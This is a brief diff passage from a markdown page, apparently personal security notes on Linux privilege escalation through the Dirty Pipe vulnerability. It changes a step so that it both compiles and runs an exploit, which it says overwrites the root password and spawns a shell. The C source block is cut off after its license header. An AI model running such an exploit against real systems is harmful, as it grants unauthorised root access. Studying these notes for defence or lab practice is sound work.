caueb/caueb.github.io/LinuxPrivesc/DirtyPipe.md

 ```

 ## Exploit
-Compile using `gcc exploit.c -o exploit`.
+Compile using `gcc exploit.c -o exploit` and run `./exploit`.
 It will overwrite the root password to `aaron` and sapwn a shell.
 ``` c exploit.c
 /* SPDX-License-Identifier: GPL-2.0 */
 /*